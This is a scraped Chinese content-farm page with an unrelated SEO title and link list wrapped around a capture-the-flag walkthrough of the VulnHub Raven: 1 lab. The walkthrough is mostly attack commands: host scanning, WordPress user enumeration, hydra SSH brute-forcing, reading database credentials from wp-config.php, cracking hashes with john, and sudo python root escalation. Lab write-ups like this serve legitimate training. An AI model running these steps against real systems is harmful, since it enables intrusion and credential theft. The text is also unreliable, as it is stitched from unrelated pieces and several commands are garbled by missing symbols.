当前位置: 首页 > news >正文

站长工具域名备案查询做网站的经验和体会

站长工具域名备案查询,做网站的经验和体会,wordpress 在线更新,电脑自己做网站可以吗一、准备工作 kali和靶机都选择NAT模式#xff08;kali与靶机同网段#xff09; 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 #xff08;1#xff09;扫描靶机开放的…一、准备工作 kali和靶机都选择NAT模式kali与靶机同网段 1.靶场环境 下载链接:Raven: 1 ~ VulnHub 2.kali的ip 命令:ifconfig 3.靶机的ip 扫描靶机ip sudo arp-scan -l 二、信息收集 1.nmap的信息收集 1扫描靶机开放的端口及其服务 nmap -A 192.168.101.127 2.网站的信息收集 1靶机开放了80端口,先访问靶机网站看看有什么有用的信息 1.访问到http://192.168.101.127/service.html它的源码发现flag1 2.进入到BLOG发现wordpress网站 3.看到wordpress网站后台登录到入口 DNS域名解析有问题 4.添加后台域名到hosts文件 1编辑hosts文件添加如下内容 sudo vim /etc/hosts 192.168.101.127 raven.local wq 2重新刷新页面访问成功 2WPscan工具 探测WordPress的漏洞可以直接使用kali自带的WPscan先暴力枚举用户名 wpscan --url http://192.168.101.127/wordpress/ -eu 1.发现了两个用户michael和steven将收集到的用户放到user.txt 3hydra工具暴力破解 1.使用hydra运用自身密码库进行暴力破解 cp /usr/share/wordlists/rockyou.txt pass hydra -L user.txt -P pass 192.168.101.127 ssh 获取到ssh登录到用户密码michael 4ssh远程登录 ssh michael192.168.101.127 三、漏洞的发现及利用 1.寻找一下flag相关文件 find / -name *flag* 2/dev/null 1查看flag2.txt,拿到flag2 cat /var/www/flag2.txt 2.MySQL 1查看靶机是否运行mysql ps -ef |grep mysql 2切换到wordpress目录发现config配置文件可能存在用户密码 cd /var/www/html/wordpress ls -la 3查看config文件发现了数据库的用户密码 用户密码为root、Rv3nSecurity cat wp-config.php 4用刚才收集到的数据库用户密码登录mysql mysql -u root -p Rv3nSecurity 5查看mysql的数据库 show databases; 6获取数据库里面的flag3、flag4 use wordpress ; show tables ; desc wp_posts; select * from wp_posts; 7发现两组用户密码 use wordpress ; select * from wp_wp_users ; michael :$P$BjRvZQ.VQcGZlDeiKToCQd.cPw5XCe0 steven:$P$Bk3VD9jsxx/loJoqNsURgHiaB23j7W/ 8john解码最后得到stevenpink84 把密码放入文件swn里面通过john解码 vim swn.txt cat swn.txt john swn.txt --wordlist/usr/share/wordlists/rockyou.txt 四、提权 1使用steven用户远程登录ssh ssh steven192.168.101.127 pink84 2利用优化命令执行终端的命令提权 sudo python -c import pty; pty.spawn(/bin/bash); flag也可在root查看
http://www.zqtcl.cn/news/30858/

相关文章:

  • 网站建设价格请咨询兴田德润网络营销推广的步骤是什么
  • php语言 电商网站建设sticklr wp wordpress
  • 假如做网站推广如何推广企业展馆策划公司
  • 网站开发实践感想东莞横沥中学
  • 网站文字公告代码湖北哪里需要建网站
  • 做桂林网站的图片做网站怎么写预算
  • 网站开发培训要多少钱硬件开发工程师工资
  • 行业门户网站建设建设工程施工合同无效
  • 网站上百度要怎么做的app开发开发公司
  • 专门做彩平的网站安徽省建设工程管理信息网
  • 民族文化网站建设的作用h5制作的网站
  • 淘宝客网站制作教程给公司做一个网站吗
  • 温州建站程序我要发布招聘信息
  • 深圳企业网站建设腾讯邮箱企业邮箱注册
  • 网站建设偶像挖主题wordpress
  • 手机网站可以做百度商桥吗政务服务中心网站建设总结
  • 网站建设合同副本宣传片拍摄公司排名
  • 女装网站模板连云港建设公司网站
  • 经典微网站网站备案如何转移
  • 华东建设发展设计有限公司网站泉州找工作网站
  • 绵阳网站制作深圳怎么注册公司网站
  • 国内优秀网页鉴赏网络营销seo是什么意思
  • 衡水建站公司怎么给网站加外链
  • 自己的电脑做服务区 网站用图片做简单网站
  • 加强国资集团网站建设免费个人网站建站
  • 咸宁网站建设哪家专业静态网页制作教程视频
  • 网站优化排名易下拉效率自己怎么免费做百度推广
  • 做一个招聘网站需要多少钱帝国cms关闭网站
  • 中国建设银行网站类型深圳建站服务公司
  • 营销型门户网站建设方案wordpress 主题logo